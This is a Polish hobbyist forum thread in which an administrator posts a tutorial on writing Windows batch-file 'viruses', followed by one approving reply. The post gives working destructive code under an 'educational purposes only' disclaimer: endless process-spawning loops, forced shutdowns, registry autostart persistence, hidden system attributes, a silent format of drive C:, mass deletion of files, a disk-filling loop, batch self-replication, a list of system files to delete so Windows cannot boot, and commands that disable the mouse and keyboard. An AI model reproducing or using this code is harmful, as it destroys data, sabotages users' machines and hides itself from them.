Forum gierkipc.fora.pl Strona Główna
 Forum
¤  Forum gierkipc.fora.pl Strona Główna
¤  Zobacz posty od ostatniej wizyty
¤  Zobacz swoje posty
¤  Zobacz posty bez odpowiedzi
gierkipc.fora.pl
Poradniki do gier i nie tylko!
 FAQFAQ   SzukajSzukaj   UżytkownicyUżytkownicy   GrupyGrupy   GalerieGalerie  RejestracjaRejestracja 
 ProfilProfil   Zaloguj się, by sprawdzić wiadomościZaloguj się, by sprawdzić wiadomości   ZalogujZaloguj 
 
Pisanie wirusów!! - .bat

Napisz nowy temat   Odpowiedz do tematu    Forum gierkipc.fora.pl Strona Główna -> Poradniki Zobacz poprzedni temat :: Zobacz następny temat  
Pisanie wirusów!! - .bat
Autor Wiadomość
Mikrus
Administrator
Administrator



Dołączył: 17 Gru 2008
Posty: 83
Przeczytał: 0 tematów

Ostrzeżeń: 0/5
Skąd: mam to wiedzieć!!

PostWysłany: Wto 20:54, 10 Lis 2009    Temat postu: Pisanie wirusów!! - .bat
 
WSZYSTKIE ZNAJDUJĄCE SIĘ TU INFORMACJE SĄ PODANE TYLKO I
WYŁĄCZNIE W CELACH EDUKACYJNYCH !!!
NIE ODPOWIADAM ZA SZKODY WYWOŁANE
PRZEZ ZŁE WYKORZYSTANIE ZAWARTEJ TU WIEDZY!!!

A teraz zajmijmy się przyjemnymi rzeczami

Pliki bat są bardzo proste do napisania i mogą wykonywać bardzo ciekawe polecenia
przez wielu nie są uważane za wirusy ale mogą narobić niezłe szkody więc dlatego zamieszczam
ten artykuł w tym dziale.

1. Tworzenie pliku "bat"
Pliki bat tworzymy w notatniku , otwieramy notatnik wpisujemy pewne polecenia ( o nich później)
i zapisujemy z rozszerzeniem bat np. nazwa.bat .

2. Polecenia
-------------------
@ech off
start [link widoczny dla zalogowanych]
------------------
Powyższy programik otwiera nam stronę onet.pl można po start wpisać co chcemy np
start cos.bat otwiera plik cos.bat
start gg.exe otwiera komunikator gg
start [link widoczny dla zalogowanych] otwiera jakąś stronę www

A teraz coś do wkurzenia
----------------
@echo off
:start
start notepad.exe
start.cmd.exe
goto :start
-----------
Ten programik działa podobnie jak powszedni otwiera notatnik i wiersz polecenia
ale najlepsze w nim jest to :

@echo off
:start to jest tak jakby znacznikiem dla programu do których funkcji ma wrócić
start notepad.exe
start.cmd.exe
goto :start goto :start to jest tu najważniejsze gdy program otworzy notatnik i wiersz poleceń wraca to do
:start i znowu otwiera notatnik i wiersz poleceń i tak bez końca w minutę mamy otwartych ponad 600 procesów Smile
----------------------
shutdown.exe -s -t 600
----------------------
ta komenda zamyka nam system Windows po 10 minutach
-s oznacza wyłączenie komputera
-t mówi po jakim czasie ma być zamknięty komputer czas jest podawany w sekundach
zamiast -s możemy dać
-r restartuje komputer
-l wylogowuje użytkownika

teraz dodajmy to do autostartu żeby przy każdym uruchomieniu komp sie wyłączał
---------------
shutdown.exe -s -t 600

@echo off
copy %0 C:\wirus.bat
@echo REGEDIT4 >>a.reg
@echo. >>a.reg
@echo [HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run] >>a.reg
@echo "win.sys"="C:\\wirus.bat" >>a.reg
@echo. >>a.reg
regedit /s a.reg
dir >nul
del a.reg >nul
i zapisujemy to jako wirus.bat tak jak podaliśmy. Dodany wpis do rejestru będzie uruchamiał
wirusa przy każdym włączeniu kompa

można zamknięcie systemu wyłączyć tą komendom :
---------------------
shutdown.exe -a
--------------------------
-------------------------
@echo off
echo T | format c: /q
cls
-------------------------------

to polecenie formatuje nam dysk C: w trybie szybkim i bez potwierdzenia
T | ( system pyta czy na pewno chcemy sformatować dysk C ten kawałek odpowiada za nas twierdząco
cls czyści ekran żeby użytkownik nie wiedział że coś sie Wogule usuwa
| ten znacznik tworzymy kombinacją klawiszy shift + \


Możemy nadać też naszemu wirusowi atrybuty systemowe
np nie Będzie widoczny nawet gdy mamy załączoną opcje
pokaż pliki ukryte
------------------------------------------
ATTRIB +S +H +R wirus.bat
-------------------------------------------
Atrybuty te możemy nadać każdemu plikowi wystarczy podać jego nazwę tak jak my podaliśmy nazwę naszego wirusa „wirus.bat”. Możemy je również zdjąć zamiast + wpiszmy - i zdejmiemy z określonego pliku atrybuty systemowe


Opóźnienie czasowe
możemy sprawić by jakaś komenda lub program uruchomiła się po konkretnym czasie

@echo off
PING -n 60 127.0.0.1 >nul
start cos.cos
po -n wpisujemy liczbę sekund tu jest np 60
po tym wpisujemy co ma sie uruchomić

tearaz jakiś wirusik
--------------------------------
@echo off
PING -n 2 127.0.0.1 >nul
start cmd.exe
start cmd.exe
PING -n 2 127.0.0.1 >nul
start cmd.exe
start cmd.exe
PING -n 2 127.0.0.1 >nul
start cmd.exe
start cmd.exe
PING -n 2 127.0.0.1 >nul
start cmd.exe
start cmd.exe
shutdown.exe -s -t 15

@echo off
copy %0 C:\wirus.bat
@echo REGEDIT4 >>a.reg
@echo. >>a.reg
@echo [HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run] >>a.reg
@echo "win.sys"="C:\\wirus.bat" >>a.reg
@echo. >>a.reg
regedit /s a.reg
dir >nul
del a.reg >nul

ATTRIB +S +H +R +A wirus.bat

--------------------------------------


Ten wirus otwiera najpierw co 2 sekundy dwa razy wiersz polecenia
otworzy ich łącznie 8 po tym uruchamia wyłączenie kompa po 15 sekundach
dopisuje się do rejestru i nadaje sobie atrybuty pliku systemowego czyli użytkownik go nie widzi
--------------------
del *exe* /s /q
--------------------
usuwa wszystkie pliki exe w trybie szybkim można zamiast exe postawić kropkę wtedy usunie wszystkie pliki
w folderze w którym sie znajduje lub z dysku albo podać jakąś nazwę pliku np. dokument.txt i usunie tylko ten plik
Pamiętajcie ze del tutaj jest spacja *exe* tutaj jest spacja /s tutaj też jest spacja /q

---------------------------------------------------------------------------------------

@echo off
regedit /e ksyf
:start
cls
type ksyf >> c:windowssystem32syf.dll
goto start
-----------------------------------------------------------------------------------
ten bat zapełnia dysk

Mówią że wirusy bat nie potrafią się rozmnażać w jednym artykule o nich znalazłem coś co powinno was zaciekawić
--------------------------------------------------------------------
@echo off
ctty nul
for %%i in (*.bat) do copy %0+%%i %%i /y >nul
--------------------------------------------------------------------
To jest sposób na doklejanie się do innego pliku bat.

----------------------------
type %0 >>inny.bat

----------------------------
Zamazywanie innego pliku bat swoim kodem

Nie wiem czy te przykłady działają nie sprawdzałem ich na swoim komputerze.

Dałem tu listę ważnych plików systemowych po których usunięciu system się nie uruchomi

C:\COMMAND.COM
C:\IO.SYS
C:\MSDOS.SYS
C:\WINDOWS\WIN.COM
C:\WINDOWS\SYSTEM\VMM32\IOS.VXD
C:\WINDOWS\SYSTEM\VMM32.VXD
C:\WINDOWS\SYSTEM\KERNEL32.DLL
C:\WINDOWS\EXPLORER.EXE
C:\WINDOWS\SYSTEM\WINOA386.MOD
C:\WINDOWS\WIN.INI
C:\WINDOWS\SYSTEM.INI





a teraz na dokładkę kilka komend
uruchamiamy je w formacie
@echo off
start i tu komenda
(nie wszystkie działają w Windows XP)

user,exitwindows - zakończenie pracy Windows
user,wnetconnectdialog - okno dialogowe Mapuj Dysk Sieciowy
user,wnetdisconnectdialog - okno dialogowe Odłącz Dysk Sieciowy
user,disableoemlayer - wyłącza grafikę Windows (wygląda jak zawieszenie)
user,enableoemlayer - włącza grafikę Windows
user,repaintscreen - odświeża ekran [F5]
user,setcursorpos - kursor myszki leci w lewy-górny róg
user,tilechildwindows - ustawia okna w rzędzie
user,cascadechildwindows - odwrotność powyższego
user,swapmousebutton - zamienia klawisze myszki
user,setcareblinktime [n] - szybkość migania kursora
user,setdoubleckilcktime [n] - szybkość dwukliku
user.exe,MessageBeep - małe piknięcie
diskcopy,DiskCopyRunDLL - okno dialogowe Kopiuj Dysk
krnl386.exe,ExitKernel - zamknięcie sesji Kernela (bardzo szybkie zamknięcie systemu)
mouse,disable - blokada myszki
keyboard,disable - blokada klawiatury
shell,shellexecute - otwiera okno explorera
shell32,OpenAS_RunDLL - okno dialogowe Otwórz z ...
shell32,SHFormatDrive - okno dialogowe Formatuj
shell32,ShellAboutA - info o pamięci fizycznej i zasobach
shell32,SHexitWindowsEX 0 - wylogowanie z Windowsa (potwierdzenie)
shell32,SHexitWindowsEX 1 - zamyka Windows (potwierdzenie)
shell32,SHexitWindowsEX 2 - restartuje Windows
shell32,SHexitWindowsEX 3 - restartuje powloke Windows
shell32,Control_RunDLL - otwiera Panel Sterowania
shell32,Control_RunDLL desk.cpl - okno właściwości ekranu
shell32,Control_RunDLL main.cpl @0 - okno wlaściwości myszki
shell32,Control_RunDLL main.cpl @1 - okno wlaściwości klawiatury
shell32,Control_RunDLL main.cpl @3 - okno drukarek
shell32,Control_RunDLL powercfg.cpl - właściwości zarządzania energią
shell32,Control_RunDLL sysdm.cpl - okno właściwości systemu
shell32,Control_RunDLL datetime.cpl - okno ustawień daty i czasu
shell32,Control_RunDLL intl.cplv - okno ustawień regionalnych
shell32,Control_RunDLL joy.cpl - okno kontrolerów gry
shell32,Control_RunDLL sticpl.cpl - wlaściwości skanerów
shell32,Control_RunDLL findfast.cpl - okno Find Fastu

Wszystkie informacje które są zawarte w tym artykule były ściągnięte z Internetu.



Post został pochwalony 0 razy
Powrót do góry Zobacz profil autora
Adam
Użytkownik
Użytkownik



Dołączył: 02 Sie 2009
Posty: 5
Przeczytał: 0 tematów

Ostrzeżeń: 0/5

PostWysłany: Czw 17:22, 04 Lut 2010    Temat postu:
 
fajny poradnik Very Happy



Post został pochwalony 0 razy
Powrót do góry Zobacz profil autora
Wyświetl posty z ostatnich:   

Napisz nowy temat   Odpowiedz do tematu    Forum gierkipc.fora.pl Strona Główna -> Poradniki Wszystkie czasy w strefie EET (Europa)
Strona 1 z 1

 
Skocz do:  
 
Nie możesz pisać nowych tematów
Nie możesz odpowiadać w tematach
Nie możesz zmieniać swoich postów
Nie możesz usuwać swoich postów
Nie możesz głosować w ankietach

 
fora.pl - załóż własne forum dyskusyjne za darmo

Powered by phpBB © 2004 phpBB Group
Galaxian Theme 1.0.2 by Twisted Galaxy